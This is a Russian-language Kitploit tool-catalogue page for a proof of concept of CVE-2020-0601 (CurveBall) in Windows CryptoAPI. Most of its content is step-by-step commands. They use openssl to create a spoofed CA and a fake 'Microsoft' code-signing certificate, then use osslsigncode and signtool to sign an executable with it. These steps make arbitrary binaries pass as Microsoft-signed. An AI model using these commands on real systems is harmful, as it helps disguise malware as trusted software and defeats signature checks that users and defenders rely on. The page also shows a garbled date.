Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2020-0601 — PoC for CVE-2020-0601- Windows CryptoAPI (Crypt32.dll) POC: https://github.com/ollypwn/CurveBall | Kitploit
Инструменты/GitHubGitHub/yanghaoi/cve-2020-0601
Payload GenerationVulnerability AnalysisCode AnalysisExploitationCryptographyBinary Exploitation
GitHubyanghaoi/cve-2020-0601

CVE-2020-0601

PoC for CVE-2020-0601- Windows CryptoAPI (Crypt32.dll) POC: https://github.com/ollypwn/CurveBall

Репозиторий
125 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2020-0601

PoC для CVE-2020-0601 - Windows CryptoAPI (Crypt32.dll) POC: https://github.com/ollypwn/CurveBall

В Kali:

  1. Создать PKCS12 файл
root@kitploit:~
openssl req -new -x509 -key spoofed_ca.key -out spoofed_ca.crt

openssl ecparam -name secp384r1 -genkey -noout -out Microsoft.key

openssl req -new -key Microsoft.key -out Microsoft.csr -config openssl_cs.conf -reqexts v3_cs

openssl x509 -req -in Microsoft.csr -CA spoofed_ca.crt -CAkey spoofed_ca.key -CAcreateserial -out Microsoft.crt -days 50000 -extfile openssl_cs.conf -extensions v3_cs

openssl pkcs12 -export -in Microsoft.crt -inkey Microsoft.key -certfile spoofed_ca.crt -name "Code Signing" -out Microsoft.p12

outPk12 2. Подписать файл:

root@kitploit:~
osslsigncode sign -pkcs12 Microsoft.p12 -n "Signed by DiDi" -pass 123 -in c1.exe -out c1_Microsoft_signed.exe

Подпись файла

  1. В Windows используйте signtool для подписи файла, расположение: "C:\Program Files (x86)\Microsoft SDKs\ClickOnce\SignTool\signtool.exe":
root@kitploit:~
signtool sign /v /f Microsoft.p12 /tr http://timestamp.digicert.com /as /fd sha256 /p 123 c1.exe

signtool.exe

*Опции глобальной команды signtool.exe: /v Отображать подробный вывод независимо от результата выполнения команды, а также предупреждения. Опции для команды sign: /f Указывает сертификат для подписи из файла. Если файл имеет формат PFX и защищен паролем, используйте опцию /p для указания пароля. Если файл не содержит закрытый ключ, используйте опции /csp и /kc для указания CSP и имени контейнера закрытого ключа. /tr Указывает URL сервера меток времени по RFC 3161. Если эта опция (или /t) отсутствует, подпись не будет иметь временной метки. Если операция с меткой времени не удалась, будет сгенерировано предупреждение. Эта опция не может использоваться вместе с /t. /as Добавляет эту подпись. Если основной подписи не существует, эта подпись становится основной. /fd Задает алгоритм дайджеста файла для создания подписи. Значение по умолчанию: SHA1. /p Задает пароль для открытия PFX-файла. (Используется с опцией /f для указания PFX-файла.)

Скачать инструмент